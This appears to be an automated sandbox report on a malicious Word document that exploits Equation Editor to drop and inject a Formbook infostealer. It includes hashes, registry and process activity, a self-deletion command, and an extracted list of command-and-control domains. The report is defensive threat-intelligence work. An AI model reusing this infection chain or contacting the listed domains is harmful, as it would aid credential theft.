Analysis
-
max time kernel
148s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
26-06-2024 01:11
Static task
static1
Behavioral task
behavioral1
Sample
3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
Resource
win10v2004-20240611-en
General
-
Target
3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx
-
Size
16KB
-
MD5
e86424648b277754b74e507d51878e71
-
SHA1
e86498df0eb2a8514e0d55f9a33148779bf5b66d
-
SHA256
3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0
-
SHA512
59c3c950a0f450b895b091fdf7f9664ed75124be0b7c699631b0a753bef062304151e1e58b3dfcc2032e819f339336c996482a6de94eee3e6327d24e8c51f84c
-
SSDEEP
384:0yXRxAxW4s8PL8wi4OEwH8TIbE91r2fR8JYbvimVmPFM:0cRM/5P3DOqnYJ6qvfVmPG
Malware Config
Extracted
formbook
4.1
btrd
everslane.com
prairieviewelectric.online
dszvhgd.com
papamuch.com
8129k.vip
jeffreestar.gold
bestguestrentals.com
nvzhuang1.net
anangtoto.com
yxfgor.top
practicalpoppers.com
thebestanglephotography.online
koormm.top
criika.net
audioflow.online
380747.net
jiuguanwang.net
bloxequities.com
v321c.com
sugar.monster
agriwithai.com
rd8.online
texanboxes.com
h7wlvwr4afx.top
furryfriendsupply.store
xmentorgroup.com
runccl.com
fairplaytavern.com
concretecountertopsolutios.com
wzxq.xyz
outletivo.com
studyasp.net
pure1027.com
xpffvn.cfd
liposuctionclinics2.today
rouchoug.top
rifasgados.com
tesourosobrerodas.site
1stclasstv.net
invest247on.com
watch2movie.xyz
martline.website
naddafornadda.com
drbtcbtc.com
turbrun.com
autounion999370.top
wirewizardselectric.net
0757hunyin.net
researchforhighschool.com
thedivorcesurvivalguide.com
emeraldsurrogatefabric.com
home-repair-contractors-kfm.xyz
onlynaturlpt.shop
agiletzal.site
dylanmoranrules.com
ngbbvuhkm5.asia
proveedorafrac.com
pho3nixkidsghana.com
greatfightcompany.com
hotnerdsg.com
thecolourgrey.com
librarylatte.com
videomademagic.com
coinrun.net
cnoszirzbkaqz.com
Signatures
-
Formbook payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/272-135-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/2716-149-0x0000000000080000-0x00000000000AF000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 11 2636 EQNEDT32.EXE -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 2 IoCs
Processes:
nelb82019.scrnelb82019.scrpid process 1824 nelb82019.scr 272 nelb82019.scr -
Loads dropped DLL 1 IoCs
Processes:
EQNEDT32.EXEpid process 2636 EQNEDT32.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
nelb82019.scrnelb82019.scrraserver.exedescription pid process target process PID 1824 set thread context of 272 1824 nelb82019.scr nelb82019.scr PID 272 set thread context of 1208 272 nelb82019.scr Explorer.EXE PID 2716 set thread context of 1208 2716 raserver.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1312 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
nelb82019.scrraserver.exepid process 272 nelb82019.scr 272 nelb82019.scr 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe 2716 raserver.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
nelb82019.scrraserver.exepid process 272 nelb82019.scr 272 nelb82019.scr 272 nelb82019.scr 2716 raserver.exe 2716 raserver.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
nelb82019.scrraserver.exeExplorer.EXEWINWORD.EXEdescription pid process Token: SeDebugPrivilege 272 nelb82019.scr Token: SeDebugPrivilege 2716 raserver.exe Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeShutdownPrivilege 1312 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1312 WINWORD.EXE 1312 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXEnelb82019.scrExplorer.EXEraserver.exeWINWORD.EXEdescription pid process target process PID 2636 wrote to memory of 1824 2636 EQNEDT32.EXE nelb82019.scr PID 2636 wrote to memory of 1824 2636 EQNEDT32.EXE nelb82019.scr PID 2636 wrote to memory of 1824 2636 EQNEDT32.EXE nelb82019.scr PID 2636 wrote to memory of 1824 2636 EQNEDT32.EXE nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1824 wrote to memory of 272 1824 nelb82019.scr nelb82019.scr PID 1208 wrote to memory of 2716 1208 Explorer.EXE raserver.exe PID 1208 wrote to memory of 2716 1208 Explorer.EXE raserver.exe PID 1208 wrote to memory of 2716 1208 Explorer.EXE raserver.exe PID 1208 wrote to memory of 2716 1208 Explorer.EXE raserver.exe PID 2716 wrote to memory of 1076 2716 raserver.exe cmd.exe PID 2716 wrote to memory of 1076 2716 raserver.exe cmd.exe PID 2716 wrote to memory of 1076 2716 raserver.exe cmd.exe PID 2716 wrote to memory of 1076 2716 raserver.exe cmd.exe PID 1312 wrote to memory of 2500 1312 WINWORD.EXE splwow64.exe PID 1312 wrote to memory of 2500 1312 WINWORD.EXE splwow64.exe PID 1312 wrote to memory of 2500 1312 WINWORD.EXE splwow64.exe PID 1312 wrote to memory of 2500 1312 WINWORD.EXE splwow64.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0.docx"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\raserver.exe"C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\nelb82019.scr"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\nelb82019.scr"C:\Users\Admin\AppData\Roaming\nelb82019.scr"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\nelb82019.scr"C:\Users\Admin\AppData\Roaming\nelb82019.scr"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
1KB
MD5d484f81016a0c21f2881004ac3b9a5b7
SHA1182f4a8d74ff4682533d2a39fb44d3b9d5bc87c3
SHA25682729f693790a30c02ee52ca1465bf2dfdc2ed44f49ce7e50e51c05f8838e434
SHA5122782fe169244301d1d1436a5bc876a56a868ae2c520eebe9e3a65fd83f502980e1d3eb937c67a375e8110a0e2e9b196fc1f240c35a0197f5753e757ffdafb9d5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
410B
MD595eedb0ec77299c11b55ab3b653ad2ad
SHA11491be29f0622bf413ac07d66711011e450d3a91
SHA2564893861581e41142fdf73f81c59229beb4c3491df309de0cfbd05f6e5e054293
SHA512550791b1dab48187fbec5faa1281393aa70b5ee701313488d0ec1cb5c66ae87f7184ca965eaa73b49a012cc1b2ecc802a6035bd9bb3eb1dfb74f8d1d2ed7e60a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5cc6a79a33e93d4f63a8622ed3c846c97
SHA179ae3f1ad4cad1b8bd38cafb9f194ca760aa6c87
SHA2563810a937b402271bc9faf28b7142f11f518f58137ce7c1744e98c085033e0a41
SHA5126aad50c69768f42594d3df573e145f461325e513a20bc00c64e44ce2a82b2787d6b3e00978a4a1769cf4318553f197d19b828e2b0df53361d30c8cd25b33f685
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
392B
MD5b168d9f611307d1840b7993c7cb4ea6b
SHA1528ee7db14b92af82d2a959326e72ede9303fe4a
SHA256b4d111181b6ff764f0538eaa94d52243d15e6f32a2d34b82ec3c782c91b96ae1
SHA512bb9e4edab45b073670e18b4b7ed16a625fbfff744d8d68946745fafbf9e3e5985e980351890d01610b4521256905232e8d25d643b6912f69640ee7aa0e6eddb6
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD5110a062d30bf55576de1fb6d9548ece0
SHA16f078364f247634c472262cbe53c55deb64bd31b
SHA256beec4b2b36227b81eb73e22c180e6d3073c240758760330ba354b38ddab08c66
SHA5126d391adcda3a4453c78f5c1493fabf1c74fdf6c0f100af16e664c47338ad495c92deb23e0274d4a442587d1ec894f5dc65809076ff5f19fc62a4fabb83884882
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{EC91BB0E-CBC0-4BBF-9365-EC5CE618ADD4}.FSDFilesize
128KB
MD530aebae81eb1a0d3710b91f449063976
SHA1278af9d6708fd91313103300df4b6bc3935af3ba
SHA2564b06efc07a1485338c2cb272376d8c836811c3e18cef2d068c660de026291ffe
SHA512ad32aa4b7c7c0926ada766b74fbddf76dba33b37bcde2184e46710635c4ec666da8cc3a71ec10961347c57069ad0cca90a87d28666e41789448dd001816475a5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\nelb[1].docFilesize
561KB
MD56b9167056af49bf702c833ae4f581ef1
SHA1ed4886d86b8ad96a0a252190705d70e0fac9289b
SHA25613bc94a2f39a03f509036ff58462b974c401cac0df52cce22223114f909b2f72
SHA5124ba4fc52c2add76cb58cec62f9ae608108aa77374c63c4416f4e5c2ac0fc4bf3569f3520e1ac77994842789015c767d3bb2dd1d384221d5fa865ab54bfc51a07
-
C:\Users\Admin\AppData\Local\Temp\Cab1FD0.tmpFilesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\Temp\{5BEA2DC5-E950-4861-8DEF-132085883B45}Filesize
